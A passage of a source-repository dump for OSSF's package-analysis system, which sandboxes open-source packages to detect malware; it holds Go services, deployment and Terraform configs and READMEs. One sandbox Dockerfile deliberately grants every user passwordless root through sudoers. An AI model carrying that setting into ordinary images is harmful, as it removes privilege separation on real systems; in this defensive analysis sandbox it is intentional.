98 | } 99 | 100 | if err := checkDirectoryExists(*downloadDir); err != nil { 101 | return err 102 | } 103 | 104 | purlFile, err := os.Open(*purlFilePath) 105 | if err != nil { 106 | return err 107 | } 108 | 109 | defer purlFile.Close() 110 | 111 | scanner := bufio.NewScanner(purlFile) 112 | for line := 1; scanner.Scan(); line += 1 { 113 | if err := processFileLine(scanner.Text()); err != nil { 114 | fmt.Fprintf(os.Stderr, "line %d: %v\n", line, err) 115 | } 116 | } 117 | 118 | return nil 119 | } 120 | 121 | func main() { 122 | if err := run(); err != nil { 123 | var cmdErr *cmdError 124 | if errors.As(err, &cmdErr) { 125 | flag.Usage() 126 | fmt.Fprintf(os.Stderr, "\n") 127 | } 128 | fmt.Fprintf(os.Stderr, "%v\n", err) 129 | os.Exit(1) 130 | } 131 | } 132 | -------------------------------------------------------------------------------- /cmd/scheduler/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | WORKDIR /src 3 | 4 | # First cache the dependencies to avoid downloading again on code change 5 | COPY ./go.mod ./ 6 | COPY ./go.sum ./ 7 | RUN go mod download 8 | 9 | COPY . 
./ 10 | RUN CGO_ENABLED=0 go build -o scheduler ./cmd/scheduler/main.go 11 | 12 | 13 | FROM gcr.io/distroless/base:nonroot@sha256:bc84925113289d139a9ef2f309f0dd7ac46ea7b786f172ba9084ffdb4cbd9490 14 | 15 | COPY --from=build /src/scheduler /usr/local/bin/scheduler 16 | 17 | ENTRYPOINT ["/usr/local/bin/scheduler"] 18 | -------------------------------------------------------------------------------- /cmd/scheduler/README.md: -------------------------------------------------------------------------------- 1 | # Scheduler 2 | 3 | This directory contains code to schedule analysis jobs based on incoming package update 4 | notifications from [Package Feeds](https://github.com/ossf/package-feeds) 5 | 6 | ## Overview 7 | 8 | The Scheduler is a Golang app that runs on Kubernetes and is deployed with [ko](https://github.com/google/ko). 9 | It is currently deployed in a GKE cluster. 10 | 11 | ### Local deployment 12 | 13 | Install ko 14 | 15 | ```bash 16 | go install github.com/google/ko@latest 17 | ``` 18 | 19 | Then run 20 | 21 | ```bash 22 | KO_DOCKER_REPO=gcr.io/ossf-malware-analysis ko resolve -f deployment.yaml | kubectl apply -f - 23 | ``` 24 | 25 | ## Design 26 | 27 | Package Feeds provides a Pub/Sub feed that provides package update notifications. 28 | Each such notification corresponds to a single package event (update / new package). 29 | 30 | The Scheduler handles ACKing the Package Feeds Pub/Sub feed, filtering out package ecosystems that are unsupported by Package Analysis and sending out another Pub/Sub notification to the Worker which triggers the actual analysis. The Worker then downloads, installs and imports (where applicable) the corresponding package, and monitors runtime behaviour. 
31 | 32 | The following ecosystems are supported 33 | - [`PyPI`](https://pypi.org/) 34 | - [`npmjs`](https://registry.npmjs.org/) 35 | - [`RubyGems`](https://rubygems.org/) 36 | - [`cargo`](https://crates.io/) 37 | - [`Packagist`](https://packagist.org/) 38 | -------------------------------------------------------------------------------- /cmd/scheduler/config/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: scheduler-deployment 5 | labels: 6 | app: scheduler 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: scheduler 12 | template: 13 | metadata: 14 | labels: 15 | app: scheduler 16 | spec: 17 | containers: 18 | - name: app 19 | image: ko://github.com/ossf/package-analysis/cmd/scheduler 20 | env: 21 | - name: OSSMALWARE_SUBSCRIPTION_URL 22 | value: gcppubsub://projects/ossf-malware-analysis/subscriptions/feed-subscription 23 | - name: OSSMALWARE_WORKER_TOPIC 24 | value: gcppubsub://projects/ossf-malware-analysis/topics/workers 25 | - name: LOGGER_ENV 26 | value: prod 27 | -------------------------------------------------------------------------------- /cmd/scheduler/proxy/proxy.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | 7 | "github.com/ossf/package-analysis/internal/log" 8 | "gocloud.dev/pubsub" 9 | ) 10 | 11 | type MessageMutateFunc func(*pubsub.Message) (*pubsub.Message, error) 12 | 13 | type PubSubProxy struct { 14 | topic *pubsub.Topic 15 | subscription *pubsub.Subscription 16 | } 17 | 18 | func New(topic *pubsub.Topic, subscription *pubsub.Subscription) *PubSubProxy { 19 | return &PubSubProxy{ 20 | topic: topic, 21 | subscription: subscription, 22 | } 23 | } 24 | 25 | func (proxy *PubSubProxy) Listen(ctx context.Context, preprocess MessageMutateFunc) error { 26 | for { 27 | msg, err := proxy.subscription.Receive(ctx) 
28 | if err != nil { 29 | slog.ErrorContext(ctx, "Error receiving message", "error", err) 30 | return err 31 | } 32 | go func(m *pubsub.Message) { 33 | innerCtx := log.ContextWithAttrs(ctx, slog.String("message_id", m.LoggableID)) 34 | outMsg, err := preprocess(msg) 35 | if err != nil { 36 | // Failure to parse and process messages should result in an acknowledgement 37 | // to avoid the message being redelivered. 38 | slog.WarnContext(innerCtx, "Error processing message", "error", err) 39 | m.Ack() 40 | return 41 | } 42 | slog.InfoContext(innerCtx, "Sending message to topic") 43 | if err := proxy.topic.Send(ctx, outMsg); err != nil { 44 | slog.ErrorContext(ctx, "Error sending message", "error", err) 45 | return 46 | } 47 | slog.InfoContext(innerCtx, "Sent message successfully") 48 | msg.Ack() 49 | }(msg) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /cmd/worker/config.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "log/slog" 5 | "os" 6 | 7 | "github.com/ossf/package-analysis/internal/resultstore" 8 | "github.com/ossf/package-analysis/internal/worker" 9 | ) 10 | 11 | // resultBucketPaths holds bucket paths for the different types of results. 
12 | type resultBucketPaths struct { 13 | analyzedPkg string 14 | dynamicAnalysis string 15 | executionLog string 16 | fileWrites string 17 | staticAnalysis string 18 | } 19 | 20 | type sandboxImageSpec struct { 21 | tag string 22 | noPull bool 23 | } 24 | 25 | type config struct { 26 | imageSpec sandboxImageSpec 27 | 28 | resultStores *worker.ResultStores 29 | 30 | subURL string 31 | packagesBucket string 32 | notificationTopicURL string 33 | 34 | userAgentExtra string 35 | } 36 | 37 | func (c *config) LogValue() slog.Value { 38 | return slog.GroupValue( 39 | slog.String("subscription", c.subURL), 40 | slog.String("package_bucket", c.packagesBucket), 41 | slog.String("dynamic_results_store", c.resultStores.DynamicAnalysis.String()), 42 | slog.String("static_results_store", c.resultStores.StaticAnalysis.String()), 43 | slog.String("file_write_results_store", c.resultStores.FileWrites.String()), 44 | slog.String("analyzed_packages_store", c.resultStores.AnalyzedPackage.String()), 45 | slog.String("execution_log_store", c.resultStores.ExecutionLog.String()), 46 | slog.String("image_tag", c.imageSpec.tag), 47 | slog.Bool("image_nopull", c.imageSpec.noPull), 48 | slog.String("topic_notification", c.notificationTopicURL), 49 | slog.String("user_agent_extra", c.userAgentExtra), 50 | ) 51 | } 52 | 53 | func resultStoreForEnv(key string) *resultstore.ResultStore { 54 | val := os.Getenv(key) 55 | if val == "" { 56 | return nil 57 | } 58 | return resultstore.New(val, resultstore.ConstructPath()) 59 | } 60 | 61 | func configFromEnv() *config { 62 | return &config{ 63 | imageSpec: sandboxImageSpec{ 64 | tag: os.Getenv("OSSF_SANDBOX_IMAGE_TAG"), 65 | noPull: os.Getenv("OSSF_SANDBOX_NOPULL") != "", 66 | }, 67 | resultStores: &worker.ResultStores{ 68 | AnalyzedPackage: resultStoreForEnv("OSSF_MALWARE_ANALYZED_PACKAGES"), 69 | DynamicAnalysis: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_RESULTS"), 70 | ExecutionLog: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS"), 71 | 
FileWrites: resultStoreForEnv("OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS"), 72 | StaticAnalysis: resultStoreForEnv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS"), 73 | }, 74 | subURL: os.Getenv("OSSMALWARE_WORKER_SUBSCRIPTION"), 75 | packagesBucket: os.Getenv("OSSF_MALWARE_ANALYSIS_PACKAGES"), 76 | notificationTopicURL: os.Getenv("OSSF_MALWARE_NOTIFICATION_TOPIC"), 77 | 78 | userAgentExtra: os.Getenv("OSSF_MALWARE_USER_AGENT_EXTRA"), 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /cmd/worker/pubsubextender/gcpdriver.go: -------------------------------------------------------------------------------- 1 | package pubsubextender 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | "net/url" 8 | "path" 9 | "regexp" 10 | "strings" 11 | "time" 12 | 13 | api "cloud.google.com/go/pubsub/apiv1" 14 | pb "cloud.google.com/go/pubsub/apiv1/pubsubpb" 15 | "gocloud.dev/pubsub" 16 | "gocloud.dev/pubsub/gcppubsub" 17 | ) 18 | 19 | const ( 20 | gcpMinAckDeadline = 10 * time.Second 21 | gcpMaxAckDeadline = 600 * time.Second 22 | ) 23 | 24 | var subscriptionPathRE = regexp.MustCompile("^projects/.+/subscriptions/.+$") 25 | 26 | type gcpDriver struct { 27 | client *api.SubscriberClient 28 | path string 29 | } 30 | 31 | func newGCPDriver(u *url.URL, sub *pubsub.Subscription) (driver, error) { 32 | d := &gcpDriver{} 33 | 34 | if u.Scheme != gcppubsub.Scheme { 35 | return nil, errors.New("unsupported scheme") 36 | } 37 | 38 | subPath := path.Join(u.Host, u.Path) 39 | if !subscriptionPathRE.MatchString(subPath) { 40 | // assume the Host is Project ID and Path is the subscription 41 | subPath = fmt.Sprintf("projects/%s/subscriptions/%s", u.Host, strings.TrimPrefix(u.Path, "/")) 42 | } 43 | 44 | var c *api.SubscriberClient 45 | if !sub.As(&c) { 46 | return nil, errors.New("not a GCP subscription") 47 | } 48 | d.client = c 49 | d.path = subPath 50 | return d, nil 51 | } 52 | 53 | // ExtendMessageDeadline implements the driver interface. 
54 | func (d *gcpDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error { 55 | // Ensure the deadline is within acceptable bounds. 56 | if deadline < gcpMinAckDeadline { 57 | deadline = gcpMinAckDeadline 58 | } else if deadline > gcpMaxAckDeadline { 59 | deadline = gcpMaxAckDeadline 60 | } 61 | 62 | var rm *pb.ReceivedMessage 63 | if !msg.As(&rm) { 64 | return errors.New("not a gcp message") 65 | } 66 | 67 | if err := d.client.ModifyAckDeadline(ctx, &pb.ModifyAckDeadlineRequest{ 68 | Subscription: d.path, 69 | AckIds: []string{rm.AckId}, 70 | AckDeadlineSeconds: int32(deadline / time.Second), 71 | }); err != nil { 72 | return fmt.Errorf("failed to extend message deadline: %w", err) 73 | } 74 | 75 | return nil 76 | } 77 | 78 | // GetSubscriptionDeadline implements the driver interface. 79 | func (d *gcpDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) { 80 | resp, err := d.client.GetSubscription(ctx, &pb.GetSubscriptionRequest{Subscription: d.path}) 81 | if err != nil { 82 | return 0, err 83 | } 84 | return time.Duration(resp.GetAckDeadlineSeconds()) * time.Second, nil 85 | } 86 | -------------------------------------------------------------------------------- /cmd/worker/pubsubextender/noopdriver.go: -------------------------------------------------------------------------------- 1 | package pubsubextender 2 | 3 | import ( 4 | "context" 5 | "time" 6 | 7 | "gocloud.dev/pubsub" 8 | ) 9 | 10 | type noopDriver struct{} 11 | 12 | // ExtendMessageDeadline implements the driver interface. 13 | func (d *noopDriver) ExtendMessageDeadline(ctx context.Context, msg *pubsub.Message, deadline time.Duration) error { 14 | return nil 15 | } 16 | 17 | // GetSubscriptionDeadline implements the driver interface. 
18 | func (d *noopDriver) GetSubscriptionDeadline(ctx context.Context) (time.Duration, error) { 19 | return 0, nil 20 | } 21 | -------------------------------------------------------------------------------- /configs/e2e/.gitignore: -------------------------------------------------------------------------------- 1 | data/ 2 | -------------------------------------------------------------------------------- /configs/e2e/config/feeds.yml: -------------------------------------------------------------------------------- 1 | feeds: 2 | - type: pypi 3 | - type: rubygems 4 | - type: packagist 5 | - type: npm 6 | - type: crates 7 | publisher: 8 | type: kafka 9 | config: 10 | brokers: ["kafka:9092"] 11 | topic: "package-feeds" 12 | 13 | poll_rate: "10h" 14 | -------------------------------------------------------------------------------- /docs/images/Pipeline diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/Pipeline diagram.png -------------------------------------------------------------------------------- /docs/images/npm_depconf-typosquat_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_depconf-typosquat_1.png -------------------------------------------------------------------------------- /docs/images/npm_random_vouchercode-generator_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_1.png -------------------------------------------------------------------------------- /docs/images/npm_random_vouchercode-generator_2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_random_vouchercode-generator_2.png -------------------------------------------------------------------------------- /docs/images/npm_roku_web_core-ajax_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/npm_roku_web_core-ajax_1.png -------------------------------------------------------------------------------- /docs/images/pypi_discordcmd_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_1.png -------------------------------------------------------------------------------- /docs/images/pypi_discordcmd_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_discordcmd_2.png -------------------------------------------------------------------------------- /docs/images/pypi_secrevthree_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ossf/package-analysis/80e6c59660156ccd5213932b383cebd14e5a3d4c/docs/images/pypi_secrevthree_1.png -------------------------------------------------------------------------------- /examples/README.md: -------------------------------------------------------------------------------- 1 | # Examples 2 | 3 | - [e2e](e2e/README.md) - A docker-compose deployment with a `package-feeds` -> `scheduler` -> `Analysis` -------------------------------------------------------------------------------- /examples/custom-sandbox/Dockerfile: 
-------------------------------------------------------------------------------- 1 | # Example dockerfile for testing an alternative ecosystem version (PHP v7.4) 2 | 3 | FROM php:7.4-zts-bullseye@sha256:a6d14c89da749f4a316846a97174c48304e605298a5fcf93d53bfbaa58b1fb04 AS image 4 | 5 | # Install Composer 6 | RUN php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" && \ 7 | php -r "if (hash_file('sha384', 'composer-setup.php') === '55ce33d7678c5a611085589f1f3ddf8b3c52d662cd01d4ba75c0ee0459970c2200a51f492d557530c71c15d8dba01eae') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" && \ 8 | php composer-setup.php && \ 9 | php -r "unlink('composer-setup.php');" && \ 10 | mv composer.phar /usr/local/bin/ 11 | 12 | RUN apt-get update && \ 13 | apt-get install -y \ 14 | curl \ 15 | wget \ 16 | git \ 17 | unzip \ 18 | libzip-dev \ 19 | libpng-dev \ 20 | sudo 21 | 22 | # Configure sudo for passwordless execution 23 | RUN echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 24 | 25 | RUN docker-php-ext-install zip && \ 26 | docker-php-ext-install gd 27 | 28 | COPY analyze.php /usr/local/bin/ 29 | RUN chmod 755 /usr/local/bin/analyze.php 30 | RUN mkdir -p /app 31 | 32 | FROM scratch 33 | COPY --from=image / / 34 | WORKDIR /app 35 | 36 | ENTRYPOINT [ "sleep" ] 37 | 38 | CMD [ "30m" ] 39 | -------------------------------------------------------------------------------- /examples/custom-sandbox/Makefile: -------------------------------------------------------------------------------- 1 | # This Makefile contains commands for building the example custom sandbox and syncing it to the local container cache 2 | 3 | # Registry for Docker images built and used by package analysis 4 | REGISTRY := gcr.io/ossf-malware-analysis 5 | IMAGE_NAME := dynamic-analysis-custom 6 | 7 | # Build the sandbox 8 | build_example_sandbox: DOCKERFILE=$(SANDBOX_DIR)/example/Dockerfile 9 | docker build -t ${REGISTRY}/$(IMAGE_NAME) 
10 | 11 | # Update (sync) locally built sandbox images from Docker to podman. 12 | # This is needed for local analysis; in order to use the updated image, 13 | # pass '-nopull' to scripts/run_analysis.sh 14 | # 15 | sync_example_sandbox: 16 | sudo buildah pull docker-daemon:${REGISTRY}/${IMAGE_NAME} 17 | -------------------------------------------------------------------------------- /examples/custom-sandbox/README.md: -------------------------------------------------------------------------------- 1 | This directory gives an example of how to build a custom sandbox for testing or development with a different analysis flow. 2 | In particular, this Docker image and analysis script can be used to analyse Packagist packages with a different version of PHP. 3 | 4 | 5 | -------------------------------------------------------------------------------- /function/loader/README.md: -------------------------------------------------------------------------------- 1 | # Loader 2 | 3 | This runs periodically as a Cloud Function to load analysis results into 4 | BigQuery. 5 | 6 | We use this instead of the BigQuery Data Transfer service as it does not support 7 | load jobs with `WRITE_TRUNCATE`. 
8 | 9 | To deploy, run the following command in this directory (/function/loader): 10 | 11 | ## Dynamic analysis results 12 | 13 | ```bash 14 | gcloud functions deploy load-data \ 15 | --region=us-central1 \ 16 | --project=ossf-malware-analysis \ 17 | --entry-point=Load \ 18 | --memory=512MB \ 19 | --runtime=go121 \ 20 | --timeout=120s \ 21 | --trigger-topic=load-data \ 22 | --set-env-vars=OSSF_MALWARE_ANALYSIS_RESULTS=ossf-malware-analysis-results,GCP_PROJECT=ossf-malware-analysis 23 | ``` 24 | 25 | ## Static analysis results 26 | 27 | ```bash 28 | gcloud functions deploy load-staticanalysis-data \ 29 | --region=us-central1 \ 30 | --project=ossf-malware-analysis \ 31 | --entry-point=LoadStaticAnalysis \ 32 | --memory=512MB \ 33 | --runtime=go121 \ 34 | --timeout=120s \ 35 | --trigger-topic=load-data \ 36 | --set-env-vars=OSSF_MALWARE_STATIC_ANALYSIS_RESULTS=ossf-malware-static-analysis-results-v1,GCP_PROJECT=ossf-malware-analysis 37 | ``` 38 | -------------------------------------------------------------------------------- /function/loader/go.mod: -------------------------------------------------------------------------------- 1 | module github.com/ossf/package-analysis/loader 2 | 3 | go 1.23.1 4 | 5 | require cloud.google.com/go/bigquery v1.65.0 6 | 7 | require ( 8 | cloud.google.com/go v0.118.0 // indirect 9 | cloud.google.com/go/auth v0.14.0 // indirect 10 | cloud.google.com/go/auth/oauth2adapt v0.2.7 // indirect 11 | cloud.google.com/go/compute/metadata v0.6.0 // indirect 12 | cloud.google.com/go/iam v1.3.1 // indirect 13 | github.com/apache/arrow/go/v15 v15.0.2 // indirect 14 | github.com/felixge/httpsnoop v1.0.4 // indirect 15 | github.com/go-logr/logr v1.4.2 // indirect 16 | github.com/go-logr/stdr v1.2.2 // indirect 17 | github.com/goccy/go-json v0.10.4 // indirect 18 | github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect 19 | github.com/google/flatbuffers v24.12.23+incompatible // indirect 20 | github.com/google/s2a-go v0.1.9 // 
indirect 21 | github.com/google/uuid v1.6.0 // indirect 22 | github.com/googleapis/enterprise-certificate-proxy v0.3.4 // indirect 23 | github.com/googleapis/gax-go/v2 v2.14.1 // indirect 24 | github.com/klauspost/compress v1.17.11 // indirect 25 | github.com/klauspost/cpuid/v2 v2.2.9 // indirect 26 | github.com/pierrec/lz4/v4 v4.1.22 // indirect 27 | github.com/zeebo/xxh3 v1.0.2 // indirect 28 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 29 | go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.58.0 // indirect 30 | go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.58.0 // indirect 31 | go.opentelemetry.io/otel v1.33.0 // indirect 32 | go.opentelemetry.io/otel/metric v1.33.0 // indirect 33 | go.opentelemetry.io/otel/trace v1.33.0 // indirect 34 | golang.org/x/crypto v0.32.0 // indirect 35 | golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8 // indirect 36 | golang.org/x/mod v0.22.0 // indirect 37 | golang.org/x/net v0.34.0 // indirect 38 | golang.org/x/oauth2 v0.25.0 // indirect 39 | golang.org/x/sync v0.10.0 // indirect 40 | golang.org/x/sys v0.29.0 // indirect 41 | golang.org/x/text v0.21.0 // indirect 42 | golang.org/x/time v0.9.0 // indirect 43 | golang.org/x/tools v0.29.0 // indirect 44 | golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect 45 | google.golang.org/api v0.216.0 // indirect 46 | google.golang.org/genproto v0.0.0-20250106144421-5f5ef82da422 // indirect 47 | google.golang.org/genproto/googleapis/api v0.0.0-20250106144421-5f5ef82da422 // indirect 48 | google.golang.org/genproto/googleapis/rpc v0.0.0-20250106144421-5f5ef82da422 // indirect 49 | google.golang.org/grpc v1.69.4 // indirect 50 | google.golang.org/protobuf v1.36.2 // indirect 51 | ) 52 | -------------------------------------------------------------------------------- /function/loader/load.go: -------------------------------------------------------------------------------- 1 | package loader 2 | 3 | import ( 4 | "context" 5 | _ 
"embed" 6 | "fmt" 7 | "os" 8 | 9 | "cloud.google.com/go/bigquery" 10 | ) 11 | 12 | //go:embed dynamic-analysis-schema.json 13 | var dynamicAnalysisSchemaJSON []byte 14 | 15 | //go:embed static-analysis-schema.json 16 | var staticAnalysisSchemaJSON []byte 17 | 18 | type PubSubMessage struct { 19 | Data []byte `json:"data"` 20 | } 21 | 22 | func runAndWaitForJob(ctx context.Context, loader *bigquery.Loader) error { 23 | job, err := loader.Run(ctx) 24 | if err != nil { 25 | return fmt.Errorf("failed to create load job: %v", err) 26 | } 27 | 28 | fmt.Printf("load job created: %s\n", job.ID()) 29 | 30 | status, err := job.Wait(ctx) 31 | if err != nil { 32 | return fmt.Errorf("error waiting for job: %w", err) 33 | } 34 | 35 | if status.Err() != nil { 36 | fmt.Printf("job completed with %d errors\n", len(status.Errors)) 37 | for idx, err := range status.Errors { 38 | fmt.Printf("error %d: %v\n", idx, err) 39 | } 40 | 41 | return status.Err() 42 | } 43 | 44 | return nil 45 | } 46 | 47 | func Load(ctx context.Context, m PubSubMessage) error { 48 | project := os.Getenv("GCP_PROJECT") 49 | bucket := os.Getenv("OSSF_MALWARE_ANALYSIS_RESULTS") 50 | 51 | bq, err := bigquery.NewClient(ctx, project) 52 | if err != nil { 53 | return fmt.Errorf("failed to create BigQuery client: %w", err) 54 | } 55 | defer bq.Close() 56 | 57 | schema, err := bigquery.SchemaFromJSON(dynamicAnalysisSchemaJSON) 58 | if err != nil { 59 | return fmt.Errorf("failed to decode schema: %w", err) 60 | } 61 | 62 | gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket)) 63 | gcsRef.Schema = schema 64 | gcsRef.SourceFormat = bigquery.JSON 65 | gcsRef.MaxBadRecords = 10000 66 | 67 | dataset := bq.Dataset("packages") 68 | loader := dataset.Table("analysis").LoaderFrom(gcsRef) 69 | loader.WriteDisposition = bigquery.WriteTruncate 70 | loader.TimePartitioning = &bigquery.TimePartitioning{ 71 | Type: bigquery.DayPartitioningType, 72 | Field: "CreatedTimestamp", 73 | } 74 | 75 | return 
runAndWaitForJob(ctx, loader) 76 | } 77 | 78 | func LoadStaticAnalysis(ctx context.Context, m PubSubMessage) error { 79 | project := os.Getenv("GCP_PROJECT") 80 | bucket := os.Getenv("OSSF_MALWARE_STATIC_ANALYSIS_RESULTS") 81 | 82 | bq, err := bigquery.NewClient(ctx, project) 83 | if err != nil { 84 | return fmt.Errorf("failed to create BigQuery client: %w", err) 85 | } 86 | defer bq.Close() 87 | 88 | schema, err := bigquery.SchemaFromJSON(staticAnalysisSchemaJSON) 89 | if err != nil { 90 | return fmt.Errorf("failed to decode schema: %w", err) 91 | } 92 | 93 | gcsRef := bigquery.NewGCSReference(fmt.Sprintf("gs://%s/*.json", bucket)) 94 | gcsRef.Schema = schema 95 | gcsRef.SourceFormat = bigquery.JSON 96 | gcsRef.MaxBadRecords = 10000 97 | 98 | dataset := bq.Dataset("packages") 99 | loader := dataset.Table("staticanalysis").LoaderFrom(gcsRef) 100 | loader.WriteDisposition = bigquery.WriteTruncate 101 | loader.TimePartitioning = &bigquery.TimePartitioning{ 102 | Type: bigquery.DayPartitioningType, 103 | Field: "created", 104 | } 105 | 106 | return runAndWaitForJob(ctx, loader) 107 | } 108 | -------------------------------------------------------------------------------- /infra/README.md: -------------------------------------------------------------------------------- 1 | # Package Analysis Infrastructure 2 | 3 | This directory contains all the configuration, documentation and scripts needed 4 | to manage the package analysis infrastructure. 5 | 6 | ## Production Cluster 7 | 8 | The Production cluster runs in GCP. 
9 | 10 | To access the cluster, run: 11 | 12 | ```shell 13 | $ gcloud container clusters get-credentials analysis-cluster --zone=us-central1-c --project=ossf-malware-analysis 14 | ``` 15 | 16 | ### Updating Container Images 17 | 18 | To update container images, run: 19 | 20 | ```shell 21 | $ cd build 22 | $ make push_all_images 23 | ``` 24 | -------------------------------------------------------------------------------- /infra/cloudbuild/dynamic_loader/cloudbuild.yaml: -------------------------------------------------------------------------------- 1 | steps: 2 | - name: gcr.io/google.com/cloudsdktool/cloud-sdk 3 | env: 4 | - 'PROJECT_ID=ossf-malware-analysis' 5 | - 'LOAD_DATASET=loading' 6 | - 'LOAD_TABLE_PREFIX=merge_' 7 | - 'DEST_DATASET=packages' 8 | - 'DEST_TABLE=analysis' 9 | - 'RESULT_BUCKET=gs://ossf-malware-analysis-results' 10 | - 'SCHEMA_FILE=function/loader/dynamic-analysis-schema.json' 11 | entrypoint: '/bin/bash' 12 | args: ['scripts/bq_load.sh'] 13 | timeout: 43200s # 12 hours 14 | options: 15 | logging: CLOUD_LOGGING_ONLY 16 | -------------------------------------------------------------------------------- /infra/cloudbuild/image_build/cloudbuild.yaml: -------------------------------------------------------------------------------- 1 | steps: 2 | - name: 'gcr.io/cloud-builders/docker' 3 | env: 4 | - 'RELEASE_TAG=$TAG_NAME' 5 | entrypoint: make 6 | args: ['cloudbuild'] 7 | timeout: 2400s 8 | -------------------------------------------------------------------------------- /infra/terraform/analysis.tf: -------------------------------------------------------------------------------- 1 | provider "google" { 2 | project = var.project 3 | region = var.region 4 | } 5 | 6 | terraform { 7 | backend "gcs" { 8 | bucket = "ossf-analysis-tf-state" 9 | prefix = "terraform/state" 10 | } 11 | } 12 | 13 | module "docker_registry" { 14 | source = "./docker_registry" 15 | 16 | project = var.project 17 | } 18 | 19 | module "build" { 20 | source = "./build" 21 | 22 | 
project = var.project 23 | github_owner = var.github_owner 24 | github_repo = var.github_repo 25 | } 26 | 27 | module "metrics" { 28 | source = "./metrics" 29 | 30 | project = var.project 31 | } -------------------------------------------------------------------------------- /infra/terraform/build/main.tf: -------------------------------------------------------------------------------- 1 | # Google Cloud Build Triggers 2 | 3 | resource "google_cloudbuild_trigger" "image-build-trigger" { 4 | name = "image-build-trigger" 5 | project = var.project 6 | 7 | github { 8 | owner = var.github_owner 9 | name = var.github_repo 10 | push { 11 | tag = "^rel-[0-9]+$" 12 | } 13 | } 14 | 15 | filename = "build/cloudbuild.yaml" 16 | } 17 | -------------------------------------------------------------------------------- /infra/terraform/build/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | variable "github_owner" {} 3 | variable "github_repo" {} 4 | -------------------------------------------------------------------------------- /infra/terraform/docker_registry/main.tf: -------------------------------------------------------------------------------- 1 | resource "google_artifact_registry_repository" "gcr_docker" { 2 | provider = google-beta 3 | 4 | project = var.project 5 | location = "us" 6 | repository_id = "gcr.io" 7 | description = "gcr.io docker container registry for OSSF Malware Analysis Images" 8 | format = "DOCKER" 9 | } 10 | 11 | resource "google_artifact_registry_repository" "us_gcr_docker" { 12 | provider = google-beta 13 | 14 | project = var.project 15 | location = "us" 16 | repository_id = "us.gcr.io" 17 | description = "us.gcr.io docker container registry for OSSF Malware Analysis Images" 18 | format = "DOCKER" 19 | } 20 | 21 | resource "google_artifact_registry_repository_iam_policy" "policy" { 22 | provider = google-beta 23 | 24 | project = 
google_artifact_registry_repository.gcr_docker.project 25 | location = google_artifact_registry_repository.gcr_docker.location 26 | repository = google_artifact_registry_repository.gcr_docker.name 27 | policy_data = data.google_iam_policy.public_registry_policy.policy_data 28 | } 29 | 30 | data "google_iam_policy" "public_registry_policy" { 31 | binding { 32 | role = "roles/artifactregistry.reader" 33 | 34 | members = [ 35 | "allUsers", 36 | ] 37 | } 38 | } -------------------------------------------------------------------------------- /infra/terraform/docker_registry/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | -------------------------------------------------------------------------------- /infra/terraform/metrics/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | -------------------------------------------------------------------------------- /infra/terraform/terraform.tfvars: -------------------------------------------------------------------------------- 1 | project = "ossf-malware-analysis" 2 | region = "us-central1" 3 | github_owner = "ossf" 4 | github_repo = "package-analysis" -------------------------------------------------------------------------------- /infra/terraform/variables.tf: -------------------------------------------------------------------------------- 1 | variable "project" {} 2 | variable "region" {} 3 | variable "github_owner" {} 4 | variable "github_repo" {} 5 | -------------------------------------------------------------------------------- /infra/worker/scaler.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: autoscaling/v2beta2 2 | kind: HorizontalPodAutoscaler 3 | metadata: 4 | name: pubsub 5 | spec: 6 | minReplicas: 1 7 | maxReplicas: 1500 8 | metrics: 9 | - external: 10 | metric: 11 | name: 
